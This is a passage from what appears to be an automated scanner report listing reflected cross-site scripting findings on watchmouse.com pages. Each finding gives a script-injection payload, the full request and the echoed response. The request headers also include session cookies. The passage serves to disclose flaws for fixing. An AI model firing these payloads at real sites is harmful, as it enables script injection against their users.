Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:01 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-68dc770236128d3194a2ffe513a1baec"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13145

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/privacy.php?46246"><script>alert(1)</script>9bf03c9f7d5=1" method="post">
...[SNIP]...

1.131. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/public-status-page.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9bdc9"><script>alert(1)</script>bb88294aa54 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9bdc9"><script>alert(1)</script>bb88294aa54/feature/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:42 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-be05360e576c233d56e25e29eec1693e"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13253

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en9bdc9"><script>alert(1)</script>bb88294aa54/feature/public-status-page.html" method="post">
...[SNIP]...

1.132. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/public-status-page.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 462b5"><script>alert(1)</script>6234e43e26f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature462b5"><script>alert(1)</script>6234e43e26f/public-status-page.html HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-95e850ad6c2bc26b34d2b51bc5767404"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature462b5"><script>alert(1)</script>6234e43e26f/public-status-page.html" method="post">
...[SNIP]...

1.133. http://www.watchmouse.com/en/feature/public-status-page.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/public-status-page.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 12dec"><script>alert(1)</script>27f8bccc38a was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/public-status-page.html12dec"><script>alert(1)</script>27f8bccc38a HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 11:59:43 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-ae61fdac524b373afec63550de3c5690"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/public-status-page.html12dec"><script>alert(1)</script>27f8bccc38a" method="post">
...[SNIP]...

1.134. http://www.watchmouse.com/en/feature/public-status-page.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/public-status-page.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2f6d9"><script>alert(1)</script>388432ad43 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/public-status-page.html?2f6d9"><script>alert(1)</script>388432ad43=1 HTTP/1.1
Host: www.watchmouse.com
Proxy-Connection: keep-alive
Referer: http://www.watchmouse.com/en/plans_price.php
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.2.10.1297252772

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 11:59:40 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Last-Modified:
ETag: "0-en-2735e7a1ef50ee8e28249f2cdc9f9897"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24217

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/public-status-page.html?2f6d9"><script>alert(1)</script>388432ad43=1" method="post">
...[SNIP]...

1.135. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/real-browser-monitoring.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73d64"><script>alert(1)</script>aab42013a99 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en73d64"><script>alert(1)</script>aab42013a99/feature/real-browser-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:49 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-63c0fa6f00e5b24070d01047c5576e0f"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13298

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/en73d64"><script>alert(1)</script>aab42013a99/feature/real-browser-monitoring.html" method="post">
...[SNIP]...

1.136. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/real-browser-monitoring.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47808"><script>alert(1)</script>ab026478454 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature47808"><script>alert(1)</script>ab026478454/real-browser-monitoring.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:51 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-4bfd110f0a2ac986236468e82196b9c5"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature47808"><script>alert(1)</script>ab026478454/real-browser-monitoring.html" method="post">
...[SNIP]...

1.137. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/real-browser-monitoring.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c9c88"><script>alert(1)</script>bf91e9ef796 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/real-browser-monitoring.htmlc9c88"><script>alert(1)</script>bf91e9ef796 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:52 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-146a13ae94863efabb3f624bc4e355e3"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13271

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/real-browser-monitoring.htmlc9c88"><script>alert(1)</script>bf91e9ef796" method="post">
...[SNIP]...

1.138. http://www.watchmouse.com/en/feature/real-browser-monitoring.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/real-browser-monitoring.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13e57"><script>alert(1)</script>34452ce25c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/real-browser-monitoring.html?13e57"><script>alert(1)</script>34452ce25c2=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:48 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-43dc1af83e01620d9f93f13a556e0ca2"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 24330

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/real-browser-monitoring.html?13e57"><script>alert(1)</script>34452ce25c2=1" method="post">
...[SNIP]...

1.139. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/root-cause-analysis.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f719a"><script>alert(1)</script>fe6f494f651 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /enf719a"><script>alert(1)</script>fe6f494f651/feature/root-cause-analysis.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:57 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f496e405fc56526c5e898d5baf8ad709"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13262

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/enf719a"><script>alert(1)</script>fe6f494f651/feature/root-cause-analysis.html" method="post">
...[SNIP]...

1.140. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/root-cause-analysis.html

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 72b68"><script>alert(1)</script>a0ac75a4b1 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature72b68"><script>alert(1)</script>a0ac75a4b1/root-cause-analysis.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:06:59 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-6b914dec999cb4301f33870ab5884863"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature72b68"><script>alert(1)</script>a0ac75a4b1/root-cause-analysis.html" method="post">
...[SNIP]...

1.141. http://www.watchmouse.com/en/feature/root-cause-analysis.html [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/root-cause-analysis.html

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 36ff7"><script>alert(1)</script>5fd6e5ae297 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/root-cause-analysis.html36ff7"><script>alert(1)</script>5fd6e5ae297 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:00 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-f27f15bb55bf33b2a5ec51a076eb4666"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 13235

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="https://secure.watchmouse.com/en/feature/root-cause-analysis.html36ff7"><script>alert(1)</script>5fd6e5ae297" method="post">
...[SNIP]...

1.142. http://www.watchmouse.com/en/feature/root-cause-analysis.html [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/root-cause-analysis.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a0776"><script>alert(1)</script>e915fb25c57 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /en/feature/root-cause-analysis.html?a0776"><script>alert(1)</script>e915fb25c57=1 HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response

HTTP/1.1 200 OK
Date: Wed, 09 Feb 2011 12:06:56 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-3721a1ca645acf9e8df3b25ee40bb4c6"
Content-Language: en
P3P: policyref="/w3c/p3p.xml",CP="NOI DSP CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 22191

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head><tit
...[SNIP]...
<form id="login_form" action="/en/feature/root-cause-analysis.html?a0776"><script>alert(1)</script>e915fb25c57=1" method="post">
...[SNIP]...

1.143. http://www.watchmouse.com/en/feature/the-watchmouse-api.html [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.watchmouse.com
Path:   /en/feature/the-watchmouse-api.html

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9656f"><script>alert(1)</script>8d1ba6a5b9a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /en9656f"><script>alert(1)</script>8d1ba6a5b9a/feature/the-watchmouse-api.html HTTP/1.1
Host: www.watchmouse.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: WMCKft=2472846; WMCKsession=d16de10cd4e84822067bb04fa255a8b1; __utmz=165779128.1297196240.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/39; __utma=165779128.2111935903.1297196240.1297196240.1297252772.2; __utmc=165779128; __utmb=165779128.10.10.1297252772;

Response (redirected)

HTTP/1.1 404 Not Found
Date: Wed, 09 Feb 2011 12:07:10 GMT
Server: Apache/2.2.9 (Debian)
X-Powered-By: PHP/5.2.6-1+lenny9
Expires:
Cache-Control: private, no-cache, must-revalidate, max-age=3600
Pragma: no-cache
Last-Modified:
ETag: "0-en-87555b0c1bac3769ae7043173709c5e1"
Content-Language: en
